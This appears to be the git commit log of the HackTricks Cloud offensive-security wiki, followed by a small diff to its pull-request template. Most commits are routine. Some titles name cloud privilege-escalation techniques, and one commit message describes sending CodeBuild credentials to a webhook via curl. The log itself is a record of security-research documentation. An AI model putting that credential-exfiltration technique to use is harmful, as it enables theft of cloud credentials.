d9b93c0df5 Update searchindex 2025-03-21 09:04:21 +00:00
SirBroccoli
62ee9ee386 Merge pull request #170 from cydtseng/minor
Minor improvements for aws-basic-information
2025-03-21 09:59:00 +01:00
SirBroccoli
1c761c2a55 Merge pull request #169 from JaimePolop/patch-23
Update az-sql.md
2025-03-21 09:58:34 +01:00
Build master
849a545f21 Update searchindex 2025-03-18 05:49:00 +00:00
Carlos Polop
cfc01c0374 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-18 06:47:31 +01:00
Carlos Polop
6915cfa68c fix 2025-03-18 06:47:26 +01:00
Build master
aed8d2e643 Update searchindex 2025-03-17 11:56:39 +00:00
Carlos Polop
b2bf4d9b07 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-17 12:55:07 +01:00
Carlos Polop
6788b5e0a5 asd 2025-03-17 12:55:00 +01:00
Build master
5c702e69b9 Update searchindex 2025-03-17 03:49:36 +00:00
Carlos Polop
42f78679a2 vm to aa 2025-03-17 04:47:59 +01:00
Cyd Tseng
6c40f6cac4 docs: minor grammar / spelling improvements for aws-basic-information 2025-03-13 00:38:23 +08:00
Jaime Polop
fcb6c989fc Update az-sql.md 2025-03-07 19:29:40 +01:00
Jaime Polop
8d310c43f5 Update az-sql.md 2025-03-07 19:28:42 +01:00
Build master
27d96d81e1 Update searchindex 2025-03-04 22:09:14 +00:00
Carlos Polop
6d88cb548f impr 2025-03-04 23:07:33 +01:00
Build master
1216308b18 Update searchindex 2025-03-02 12:55:20 +00:00
Carlos Polop
00f4a32ae3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-02 13:53:42 +01:00
Carlos Polop
96579673c1 sentinel 2025-03-02 13:53:38 +01:00
Build master
f8c4c4d8ac Update searchindex 2025-03-02 00:21:20 +00:00
Carlos Polop
3902e8cafd Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-02 01:19:46 +01:00
Carlos Polop
39876cd315 defender + monitoring 2025-03-02 01:19:42 +01:00
Build master
d668cf5452 Update searchindex 2025-02-26 15:52:26 +00:00
Carlos Polop
d54cb2b5ff virtual desktops 2025-02-26 16:50:45 +01:00
Carlos Polop
c79c359fd2 asd 2025-02-26 02:00:25 +01:00
Carlos Polop
1efe5e7e77 asd 2025-02-26 01:40:13 +01:00
Carlos Polop
7991ff4fae asd 2025-02-26 01:19:35 +01:00
Carlos Polop
045b6c2320 asd 2025-02-26 00:38:39 +01:00
Carlos Polop
ab888d748c asd 2025-02-26 00:32:20 +01:00
Carlos Polop
5d3c7b0348 asd 2025-02-26 00:14:56 +01:00
Carlos Polop
d77d87d686 a 2025-02-25 23:37:57 +01:00
Carlos Polop
9c0cfb6529 a 2025-02-25 23:33:09 +01:00
Carlos Polop
2730856acc a 2025-02-25 23:29:26 +01:00
Carlos Polop
221636beae Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-25 23:07:12 +01:00
Carlos Polop
740801ab61 a 2025-02-25 23:07:08 +01:00
Build master
23ce7a243e Update searchindex 2025-02-25 21:58:00 +00:00
SirBroccoli
13f89a6674 Merge pull request #168 from JaimePolop/master
vitualdesktop
2025-02-25 22:56:31 +01:00
Jimmy
776d9f73df vitualdesktop 2025-02-25 12:41:45 +01:00
Jimmy
c8c09b0abb vitualdesktop 2025-02-25 12:37:08 +01:00
Build master
329ef07c7e Update searchindex 2025-02-25 05:08:47 +00:00
Carlos Polop
aad012f215 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-25 06:06:50 +01:00
Carlos Polop
50029a6488 logic apps 2025-02-25 06:06:45 +01:00
Build master
5bb4e02a58 Update searchindex 2025-02-24 10:29:46 +00:00
Carlos Polop
c0a3872982 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-24 11:27:05 +01:00
Carlos Polop
a19517f026 az functions 2025-02-24 11:27:01 +01:00
Build master
429913c5ec Update searchindex 2025-02-22 16:14:23 +00:00
Carlos Polop
2d32b37d9c Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-22 17:12:56 +01:00
Carlos Polop
77da1e58ca static web apps 2025-02-22 17:12:53 +01:00
Build master
516553f4bf Update searchindex 2025-02-22 12:46:54 +00:00
SirBroccoli
188b9a7b0a Merge pull request #166 from JaimePolop/master
new
2025-02-22 13:45:25 +01:00
Jimmy
58556acb7d new 2025-02-22 13:38:23 +01:00
Jimmy
0148473b67 new 2025-02-22 13:34:13 +01:00
Jimmy
b832183456 new 2025-02-22 13:27:27 +01:00
Build master
3e96d64e50 Update searchindex 2025-02-21 23:33:51 +00:00
Carlos Polop
7336c976ae Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-22 00:32:13 +01:00
Carlos Polop
def87f1ffb asd 2025-02-22 00:32:09 +01:00
Build master
b715d43fad Update searchindex 2025-02-21 13:57:18 +00:00
Carlos Polop
c6b3795cc5 fix workflows 2025-02-21 14:55:41 +01:00
Carlos Polop
8fa715b08d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 12:44:07 +01:00
Carlos Polop
aeb3f8b582 a 2025-02-21 12:44:01 +01:00
Build master
568e936ca0 Update searchindex 2025-02-21 11:02:56 +00:00
Carlos Polop
2456bca341 a 2025-02-21 12:01:31 +01:00
Carlos Polop
f138e0366f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 12:00:43 +01:00
Carlos Polop
c089890c84 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 00:14:46 +01:00
Build master
901725b847 Update searchindex 2025-02-20 23:14:18 +00:00
Carlos Polop
fea4bb8938 impr 2025-02-21 00:13:14 +01:00
SirBroccoli
7026e4e728 Merge pull request #163 from JaimePolop/master
Cosmosdb
2025-02-21 00:12:51 +01:00
Jaime Polop
0e15aeffba Delete searchindex.json 2025-02-20 23:21:38 +01:00
Jimmy
b7dc63cd26 a 2025-02-20 23:20:59 +01:00
Build master
4c9c8c10ac Update searchindex 2025-02-20 12:10:09 +00:00
Carlos Polop
64f5661515 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-20 13:08:28 +01:00
Carlos Polop
bee34f3c05 fixes 2025-02-20 13:08:24 +01:00
Build master
2f84f3f328 Update searchindex 2025-02-20 00:56:04 +00:00
Carlos Polop
892232fe26 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-20 01:54:38 +01:00
Carlos Polop
c71aa6f7b1 a 2025-02-20 01:54:29 +01:00
Carlos Polop
ab3e89c82d more sql 2025-02-20 01:53:49 +01:00
Build master
caf320e355 Update searchindex 2025-02-20 00:51:55 +00:00
Carlos Polop
e841f06505 sql and other fixes 2025-02-20 01:50:24 +01:00
Build master
6456eab2cf Update searchindex 2025-02-20 00:36:33 +00:00
SirBroccoli
3c746383c6 Merge pull request #162 from JaimePolop/master
sql & others
2025-02-20 01:35:07 +01:00
Jaime Polop
064162062f Delete searchindex.json 2025-02-20 00:57:18 +01:00
Jimmy
e3ca81040e asd 2025-02-20 00:55:53 +01:00
Build master
4313cc72bc Update searchindex 2025-02-19 01:29:33 +00:00
Carlos Polop
80b91382f3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-19 02:28:04 +01:00
Carlos Polop
0828130954 az sql 2025-02-19 02:27:59 +01:00
Build master
94e634230a Update searchindex 2025-02-18 11:18:25 +00:00
Carlos Polop
5e48ce18e0 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-18 12:16:45 +01:00
Carlos Polop
61c70bfefd improvements 2025-02-18 12:16:41 +01:00
Build master
ce2ede1e01 Update searchindex 2025-02-17 20:57:20 +00:00
Carlos Polop
127c85e7d2 impr servicebus 2025-02-17 21:55:47 +01:00
Build master
40e08a1893 Update searchindex 2025-02-17 18:27:14 +00:00
Carlos Polop
e746e3e353 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 19:25:47 +01:00
Carlos Polop
0f7175eb98 fix 2025-02-17 19:25:37 +01:00
Build master
d109bb6b44 Update searchindex 2025-02-17 18:21:54 +00:00
Carlos Polop
2505aec847 fix build 2025-02-17 19:20:11 +01:00
Carlos Polop
cc5dc4c885 summary update 2025-02-17 18:15:16 +01:00
Carlos Polop
09a10afd24 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 18:09:02 +01:00
Carlos Polop
0d9b4e5917 aa persistence 2025-02-17 18:08:59 +01:00
SirBroccoli
ad0fd2ac62 Merge pull request #161 from JaimePolop/master
sql and servicebus
2025-02-17 12:56:22 +01:00
Build master
47c4eb2f02 Update searchindex 2025-02-17 11:52:19 +00:00
Jaime Polop
8b8705f5a2 Delete searchindex.json 2025-02-17 12:51:09 +01:00
Build master
e82c35b07f Update searchindex 2025-02-17 11:49:02 +00:00
Jimmy
5f47797e6a updates 2025-02-17 12:41:24 +01:00
Build master
90a2f79a0f Update searchindex 2025-02-17 10:56:10 +00:00
Carlos Polop
baa1c7240d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 11:54:31 +01:00
Carlos Polop
0f6da30192 fix summary 2025-02-17 11:54:27 +01:00
Build master
06d67a4432 Update searchindex 2025-02-16 17:27:19 +00:00
Carlos Polop
f9413e0d34 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-16 18:25:48 +01:00
Carlos Polop
31acbca2ed privesc jobs az 2025-02-16 18:25:44 +01:00
Build master
e938af6965 Update searchindex 2025-02-15 17:50:26 +00:00
Carlos Polop
8d0d445b93 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 18:48:59 +01:00
Carlos Polop
9cd2ef8e2f fixes 2025-02-15 18:48:56 +01:00
Build master
c4b06ab12c Update searchindex 2025-02-15 15:25:20 +00:00
Carlos Polop
5537bfe63d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 16:23:52 +01:00
Carlos Polop
6e477bc296 update container services az 2025-02-15 16:23:48 +01:00
Build master
46af6b9474 Update searchindex 2025-02-15 03:24:48 +00:00
Carlos Polop
e6644e6caa improvements 2025-02-15 04:23:19 +01:00
Carlos Polop
fcc20e6908 a 2025-02-15 03:00:32 +01:00
Carlos Polop
8be9956703 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 02:17:10 +01:00
Carlos Polop
2be77df66d a 2025-02-15 02:17:06 +01:00
Build master
8594fa5343 Update searchindex 2025-02-15 01:16:02 +00:00
SirBroccoli
ba04a6a2ff Merge pull request #158 from raadfhaddad/master
Update aws-macie-privesc.md
2025-02-15 02:14:40 +01:00
Build master
d2f2655fc4 Update searchindex 2025-02-14 18:20:02 +00:00
Carlos Polop
5a5104fe95 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 19:18:33 +01:00
Carlos Polop
ef85d7fdd5 unauth container registry 2025-02-14 19:18:28 +01:00
Carlos Polop
83bc9f97e8 f 2025-02-14 17:20:39 +01:00
Build master
d3b9883283 Update searchindex 2025-02-14 16:20:08 +00:00
Carlos Polop
81acaa16e0 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 17:18:44 +01:00
Carlos Polop
70d0f13e7e f 2025-02-14 17:18:40 +01:00
Build master
8392cf548c Update searchindex 2025-02-14 15:44:15 +00:00
Carlos Polop
0b97b3caff Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 16:42:53 +01:00
Carlos Polop
4df9252db4 fixes 2025-02-14 16:42:49 +01:00
Raad
3350e31738 Update aws-macie-privesc.md 2025-02-14 08:16:32 +01:00
Build master
17be115fa6 Update searchindex 2025-02-13 17:45:51 +00:00
Carlos Polop
ccbbfaee00 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-13 18:44:25 +01:00
Carlos Polop
b98496aaed f 2025-02-13 18:44:21 +01:00
Build master
30399528e4 Update searchindex 2025-02-13 10:01:56 +00:00
Carlos Polop
650655363f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-13 11:00:31 +01:00
Carlos Polop
615a959bb6 fix macie 2025-02-13 11:00:27 +01:00
Build master
0d198fe961 Update searchindex 2025-02-13 09:54:32 +00:00
SirBroccoli
abbd0a816b Merge pull request #157 from raadfhaddad/master
Create aws-macie-privesc.md
2025-02-13 10:53:03 +01:00
Carlos Polop
13df9aee51 f 2025-02-13 10:51:25 +01:00
Raad
eb110dfd72 Create aws-macie-enum.md 2025-02-12 22:21:39 +01:00
Raad
491627bf9f Merge branch 'HackTricks-wiki:master' into master 2025-02-12 22:18:35 +01:00
Carlos Polop
ca5a9e1037 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 18:21:54 +01:00
Carlos Polop
7537334e2c a 2025-02-12 18:21:49 +01:00
Congon4tor
bb664c142d changes serchindex ulrs 2025-02-12 18:06:33 +01:00
Carlos Polop
4eafaed2b1 m 2025-02-12 15:58:21 +01:00
Carlos Polop
e158438a0f master workflow 2025-02-12 15:33:47 +01:00
Carlos Polop
57da0bf8db run gh 2025-02-12 15:25:17 +01:00
Carlos Polop
ae7aefe448 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 15:24:14 +01:00
Carlos Polop
19401f19d6 searchindex master 2025-02-12 15:24:09 +01:00
Congon4tor
92b3c384c8 Fix links and update search index url 2025-02-12 14:47:59 +01:00
Carlos Polop
0d26e5ed8c Update searchindex 2025-02-12 14:42:59 +01:00
Carlos Polop
cd5de3879c f 2025-02-12 14:37:24 +01:00
Carlos Polop
dc557dad46 try 2025-02-12 14:32:25 +01:00
Carlos Polop
d6597f9990 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 14:31:51 +01:00
Carlos Polop
77a117d772 searchindex test 1 2025-02-12 14:31:47 +01:00
Congon4tor
699a707bb6 Add searchindex to repo 2025-02-12 14:13:04 +01:00
Raad
b741525093 Create aws-macie-privesc.md 2025-02-11 21:46:29 +01:00
Carlos Polop
60b1ca6b88 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-11 17:56:14 +01:00
Carlos Polop
30236714f5 f 2025-02-11 17:56:10 +01:00
SirBroccoli
f258a13eef Merge pull request #156 from JaimePolop/master
FIxes
2025-02-11 00:28:49 +01:00
Carlos Polop
4e491e3f55 fixes 2025-02-11 00:28:34 +01:00
Jimmy
b3cfc40029 Merge branch 'master' of https://github.com/JaimePolop/hacktricks-cloud 2025-02-10 12:44:38 +01:00
Jimmy
26bf439a59 Y 2025-02-10 12:31:51 +01:00
Jimmy
3757efbd43 Y 2025-02-10 12:22:24 +01:00
Carlos Polop
d13ebeaeb5 f 2025-02-10 01:21:01 +01:00
Carlos Polop
3f01e5e4fa f 2025-02-09 18:51:16 +01:00
Carlos Polop
8452766003 fixes 2025-02-09 18:51:11 +01:00
Carlos Polop
9bea483104 fix banner 2025-02-09 15:53:44 +01:00
Carlos Polop
7162236a6b fix 2025-02-08 19:54:20 +01:00
Carlos Polop
f5c7490026 mor einfo 2025-02-08 19:47:32 +01:00
Carlos Polop
2383d6958b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-08 19:23:46 +01:00
Carlos Polop
fd5fc9957a azure basics 2025-02-08 19:23:41 +01:00
SirBroccoli
d42d244a6a Merge pull request #154 from JaimePolop/patch-22
Update az-storage-privesc.md
2025-02-08 14:46:52 +01:00
Carlos Polop
117bb933af improvements 2025-02-07 01:02:14 +01:00
Carlos Polop
9a9ea3101f typo 2025-02-06 03:12:35 +01:00
Carlos Polop
ec6fcd37f0 impr 2025-02-06 00:34:19 +01:00
Carlos Polop
551524079b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-04 19:06:01 +01:00
Carlos Polop
92d27a9632 add perm Microsoft.ContainerRegistry/registries/generateCredentials/action 2025-02-04 19:05:56 +01:00
Jaime Polop
cfcc836974 Update az-storage-privesc.md 2025-02-03 11:26:08 +01:00
SirBroccoli
7838f68347 Merge pull request #152 from hhoollaa1/master
EFS IP Enumeration Python Script
2025-02-02 19:21:19 +01:00
SirBroccoli
452fb430b3 Merge pull request #153 from JaimePolop/patch-21
Update az-file-shares.md
2025-01-29 12:33:13 +01:00
Jaime Polop
ba94d85a36 Update az-file-shares.md 2025-01-29 12:29:56 +01:00
hhoollaa1
a9b9e95899 Update aws-efs-enum.md 2025-01-27 21:10:05 +01:00
SirBroccoli
5a2543873e Merge pull request #151 from JaimePolop/master
azuread MS Graph
2025-01-27 15:19:11 +01:00
Jaime Polop
b353597cd3 Update az-azuread.md 2025-01-27 11:58:13 +01:00
Jaime Polop
9ed1b29bb9 Update az-azuread.md 2025-01-27 02:10:28 +01:00
Carlos Polop
01295fcd13 dataproc 2025-01-26 22:47:34 +01:00
SirBroccoli
81d2665909 Merge pull request #148 from shamo0/master
grte-shamooo
2025-01-26 22:45:09 +01:00
Mac
873eba38c0 dataproc enum & privesc 2025-01-27 00:14:46 +04:00
Carlos Polop
979ea57c3b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-26 18:53:28 +01:00
Carlos Polop
ae6616b63b comparison reader with security reader 2025-01-26 18:53:24 +01:00
Mac
dbac949488 dataproc privesc update 2025-01-26 21:53:14 +04:00
Congon4tor
3e06c28e43 updated preprocessor 2025-01-26 18:16:58 +01:00
SirBroccoli
5d21fb67a6 Merge pull request #147 from JaimePolop/master
CloudShell & LogicApps
2025-01-26 16:10:25 +01:00
SirBroccoli
25395ae94a Merge branch 'master' into master 2025-01-26 16:10:16 +01:00
Carlos Polop
626155bec1 small fixes 2025-01-26 16:06:53 +01:00
Carlos Polop
8f02f9f5a5 fix 2025-01-26 15:48:40 +01:00
Carlos Polop
d9c68fcf04 fix 2025-01-26 15:21:37 +01:00
Carlos Polop
c76f3defdd a 2025-01-26 12:02:02 +01:00
Carlos Polop
569f2be7c9 impr 2025-01-26 11:42:59 +01:00
Carlos Polop
416e7cf699 improvements 2025-01-25 15:33:23 +01:00
Mac
480c6ba178 dataproc privesc 2025-01-23 20:54:49 +04:00
Carlos Polop
8f6514eed9 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-23 00:04:03 +01:00
Carlos Polop
6736e6d5c8 more azure stuff 2025-01-23 00:03:36 +01:00
Jaime Polop
1bc1085d79 Update SUMMARY.md 2025-01-22 13:21:20 +01:00
Jaime Polop
50f10aa913 Update az-static-web-apps.md 2025-01-22 13:17:57 +01:00
Jaime Polop
bb6035c0ca Update SUMMARY.md 2025-01-22 13:13:24 +01:00
SirBroccoli
b6310f4ac6 Merge pull request #141 from VL4DYSL4V/VL4DYSL4V-k8s-privesc-via-secrets-create-and-read
Added K8s privesc technique via Create & Read secrets
2025-01-22 13:03:38 +01:00
SirBroccoli
9bcaf7c6df Merge pull request #145 from JaimePolop/patch-20
Update az-cosmosDB.md
2025-01-22 10:49:35 +01:00
SirBroccoli
a60a5be8d2 Merge pull request #142 from VL4DYSL4V/VL4DYSL4V-create-and-delete-k8s-pods-with-curl
Added scripts for creating & deleting K8s pods, SAs, Roles, RoleBindings, and Secrets with curl
2025-01-22 10:49:19 +01:00
Carlos Polop
250329b9aa fix summary 2025-01-21 19:38:49 +01:00
Carlos Polop
64ab139a57 azure automatic tools 2025-01-21 18:15:39 +01:00
Jaime Polop
38ec0650ca Update SUMMARY.md 2025-01-17 17:41:33 +01:00
Jaime Polop
a027dd2a21 Add files via upload 2025-01-17 17:39:20 +01:00
Jaime Polop
1e69b05fe7 Add files via upload 2025-01-17 17:38:57 +01:00
Jaime Polop
9f84500da6 Update SUMMARY.md 2025-01-16 12:49:17 +01:00
Jaime Polop
62664886c7 Add files via upload 2025-01-16 12:47:56 +01:00
Jaime Polop
e4b1066789 Add files via upload 2025-01-16 12:47:24 +01:00
Jaime Polop
0f2e9443ca Add files via upload 2025-01-16 12:46:39 +01:00
Jaime Polop
dbb3f98a12 Update az-cosmosDB.md 2025-01-13 17:03:55 +01:00
Jaime Polop
234398ad6e Merge branch 'HackTricks-wiki:master' into master 2025-01-13 16:39:28 +01:00
Jaime Polop
a6e5b378be Update az-cosmosDB.md 2025-01-13 16:39:17 +01:00
Vladyslav
cdd6583bb6 Update kubernetes-enumeration.md 2025-01-13 15:08:23 +02:00
Vladyslav
12c468f714 Update kubernetes-enumeration.md 2025-01-13 14:58:03 +02:00
Carlos Polop
0996afea1b azure container 2025-01-12 19:42:21 +01:00
Jaime Polop
3fd7b2b8a2 Merge branch 'HackTricks-wiki:master' into master 2025-01-12 11:55:47 +01:00
Jimmy
e47fdfb9ea Update pwsh 2025-01-12 11:55:13 +01:00
SirBroccoli
d6f87481ef Merge pull request #139 from JaimePolop/master
CosmosDB, Postgres and MySQL
2025-01-11 19:28:52 +01:00
Vladyslav
3000c3b4fe Added scripts for creating & deleting K8s pods with curl 2025-01-11 16:42:38 +02:00
Vladyslav
15ce1f2a40 Added K8s privesc technique via Create & Read secrets 2025-01-11 15:20:34 +02:00
Jaime Polop
8ec34fc329 Merge branch 'HackTricks-wiki:master' into master 2025-01-10 18:50:57 +01:00
Jaime Polop
5d6efaa6a6 Update SUMMARY.md 2025-01-10 18:50:36 +01:00
Carlos Polop
73e6fee408 auto acc 2025-01-10 18:39:42 +01:00
Jimmy
833b571498 Update URLs 2025-01-10 16:34:21 +01:00
Jaime Polop
37bf365f5b Merge branch 'HackTricks-wiki:master' into master 2025-01-10 15:02:54 +01:00
Carlos Polop
8b52bc23a3 automation acc hybrid workers 2025-01-10 14:16:44 +01:00
Carlos Polop
d9f6b34673 fix ec2 + automation accounts 2025-01-10 12:59:11 +01:00
Jaime Polop
9021590856 Update SUMMARY.md 2025-01-10 11:32:04 +01:00
Jaime Polop
8ea0f4a3f1 Update az-cosmosDB-post-exploitation.md 2025-01-10 11:28:42 +01:00
Jaime Polop
78334993a2 Update az-cosmosDB.md 2025-01-10 11:26:58 +01:00
Jaime Polop
e8cee6743c Add files via upload 2025-01-10 11:06:35 +01:00
Jaime Polop
55fc400bf7 Add files via upload 2025-01-10 11:02:38 +01:00
Jaime Polop
dc16c9ff9f Add files via upload 2025-01-10 11:01:45 +01:00
Carlos Polop
6d926a6f72 local hacktricks cloud 2025-01-09 18:20:22 +01:00
Carlos Polop
d9a7ae2880 build coker public 2025-01-09 17:59:36 +01:00
Carlos Polop
be659333c8 fix keyvault.md 2025-01-09 17:34:55 +01:00
Carlos Polop
cb67f59e59 images 2025-01-09 17:29:41 +01:00
Carlos Polop
b3f82cc35c fix hacktricks cloud 2025-01-09 15:46:23 +01:00
Carlos Polop
1f00ec798e write packages 2025-01-09 09:50:32 +01:00
Carlos Polop
782d409f47 en 2025-01-09 09:45:51 +01:00
Carlos Polop
30f14affe7 t11 2025-01-09 09:44:48 +01:00
Carlos Polop
65cfe4be40 handle exception 2025-01-09 09:44:32 +01:00
Carlos Polop
39ef4428ef build master 2025-01-09 09:36:04 +01:00
Carlos Polop
de7e5d2eb0 t10 2025-01-09 09:31:45 +01:00
Carlos Polop
78f6ebfdc9 install awscli in the container 2025-01-09 09:19:39 +01:00
Carlos Polop
4b9cb59f09 fr 2025-01-09 09:17:47 +01:00
Carlos Polop
3b671863b3 t9 2025-01-09 09:15:28 +01:00
Carlos Polop
110692ec5f t8 2025-01-09 09:10:14 +01:00
Carlos Polop
065d29019c t7 2025-01-09 09:06:37 +01:00
Carlos Polop
184a36301a translator 2025-01-09 09:04:23 +01:00
Carlos Polop
c3b572db87 t6 2025-01-09 08:43:19 +01:00
Carlos Polop
894d2f8dc6 t5 2025-01-09 08:34:24 +01:00
Carlos Polop
3eff514680 t4 2025-01-09 02:04:38 +01:00
Carlos Polop
4fae1360a8 t3 2025-01-09 01:55:16 +01:00
Carlos Polop
372ccdf299 t2 2025-01-09 01:52:23 +01:00
Carlos Polop
0c3d697d67 t2 2025-01-09 01:52:19 +01:00
Carlos Polop
cdf8430598 t 2025-01-09 01:49:44 +01:00
Carlos Polop
432e916b2f translators 2025-01-09 01:47:16 +01:00
Carlos Polop
cb23139acd d 2025-01-09 01:29:31 +01:00
Carlos Polop
1a41153b95 docker 2025-01-09 01:26:48 +01:00
Carlos Polop
06184f73ec build docker 2025-01-09 01:25:03 +01:00
Carlos Polop
bde9b73eb1 docker 2025-01-09 01:18:30 +01:00
Carlos Polop
69db82891a cat error preprod 2025-01-09 01:05:33 +01:00
Carlos Polop
52142003ec add az-static-web-apps-privesc.md 2025-01-08 23:51:34 +01:00
Carlos Polop
a850e268dc fix transaltor 2025-01-08 23:50:53 +01:00
Carlos Polop
cc120ade68 translate az-app-services-privesc.md 2025-01-08 22:00:23 +01:00
Carlos Polop
3000248da2 fix translator log 2025-01-08 21:59:46 +01:00
SirBroccoli
1a5f666c80 Merge pull request #138 from ex16x41/patch-5
Update aws-codebuild-privesc.md
2025-01-08 21:36:25 +01:00
Eva
95f91529c7 Update aws-codebuild-privesc.md
Create a hook.json file with command to send output from curl credentials URI to your webhook address
2025-01-08 21:27:54 +01:00
Carlos Polop
b65df65002 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-07 00:43:41 +01:00
Carlos Polop
1c333d4cab static web 2025-01-07 00:43:37 +01:00
Congon4tor
b0794c4b1c Support # in refs 2025-01-06 18:02:23 +01:00
Carlos Polop
009ef58e30 static 2025-01-05 23:48:40 +01:00
Carlos Polop
ad6c542f82 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-05 21:15:16 +01:00
Carlos Polop
3a7480d764 MIGRATION TYPOS 2025-01-05 21:15:12 +01:00
SirBroccoli
4b71029629 Merge pull request #134 from offensive-actions/add-terraform-state-rce-and-dynamodb-privesc
arte-administrator
2025-01-05 16:05:38 +01:00
Carlos Polop
c1aee098b6 actas in cloudbuild 2025-01-05 16:03:29 +01:00
Carlos Polop
ec0ff62bcb fix translator 2025-01-05 15:32:32 +01:00
Carlos Polop
2244c6b485 clean images 2025-01-05 15:31:07 +01:00
Carlos Polop
61bc94e77d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-05 11:29:54 +01:00
Carlos Polop
13358c1371 fix links 2025-01-05 11:29:50 +01:00
SirBroccoli
1e29cb77cc Merge pull request #135 from HackTricks-wiki/support-file-downloads
Support file downloads
2025-01-04 18:48:56 +01:00
Carlos Polop
d65983432b app services 2025-01-04 04:38:52 +01:00
Carlos Polop
18d1953edd app services 2025-01-04 01:32:19 +01:00
Carlos Polop
c395861d3d improve translator 2025-01-04 00:25:53 +01:00
Carlos Polop
d9247bf598 app services 2025-01-03 20:16:15 +01:00
Congon4tor
853e602bc2 Support file downloads 2025-01-03 19:35:15 +01:00
Benedikt Haußner
8750a93d41 add dynamodb privilege escalation via putting of resource based policy 2025-01-03 15:26:44 +01:00
Benedikt Haußner
b918609383 add fully working solution for privesc via terraform state file poisoning and reference from s3 privilege escalation to that technique 2025-01-03 15:26:16 +01:00
Carlos Polop
3d1f96fd4a Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-03 12:21:56 +01:00
Carlos Polop
9eec79f700 app services 2025-01-03 12:21:52 +01:00
SirBroccoli
8a25a0856f Update translator.py 2025-01-03 11:42:03 +01:00
SirBroccoli
e67cc3f450 Merge pull request #133 from HackTricks-wiki/robots-txt
Add robots.txt
2025-01-03 10:47:48 +01:00
SirBroccoli
194ae6d76b Merge pull request #132 from HackTricks-wiki/add-language-selector
Fixes language UI
2025-01-03 10:47:06 +01:00
Congon4tor
d53ffc12eb Fix page index with links 2025-01-03 03:30:47 +01:00
Congon4tor
c520826284 Add read time to all pages 2025-01-03 02:52:56 +01:00
Congon4tor
7a0a0329a7 Add robots.txt 2025-01-03 01:46:36 +01:00
Congon4tor
a7bf8124da Fixes language UI 2025-01-03 01:09:11 +01:00
Carlos Polop
b340bf8ada t 2025-01-02 22:26:08 +01:00
Carlos Polop
bad627b7db lang 2025-01-02 21:53:56 +01:00
Carlos Polop
96cc8f9772 languages 2025-01-02 21:53:49 +01:00
SirBroccoli
1922e106fd Merge pull request #131 from HackTricks-wiki/add-language-selector
Add language selector
2025-01-02 21:47:43 +01:00
Congon4tor
d7d5e4a93c Add language selector 2025-01-02 21:18:12 +01:00
Carlos Polop
716aa06779 translate 2 2025-01-01 23:55:27 +01:00
Carlos Polop
4ef00e6b1b translate fix 2025-01-01 23:55:17 +01:00
Carlos Polop
2beb8398a6 translate 2 2025-01-01 21:36:26 +01:00
Carlos Polop
d0b9174054 translate 2025-01-01 21:36:15 +01:00
Carlos Polop
d0e6a85e6f update translator 2025-01-01 21:23:33 +01:00
Carlos Polop
d96df379fd trasnlate other half 2024-12-31 18:48:54 +01:00
Carlos Polop
4d622f5500 translate half 2024-12-31 18:48:31 +01:00
709 changed files with 35058 additions and 41996 deletions


@@ -1,12 +1,16 @@
Before sending the PR, you can remove this content:
You can remove this content before sending the PR:
## Attribution
We value your knowledge and encourage you to share content. Please make sure you only upload content that you own or that you have the original author's permission to share (adding a reference to the author in the added text, at the end of the page you are modifying, or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
## Attribution
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
## HackTricks Training
If you are contributing so you can pass the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to name the PR `arte-<username>`.
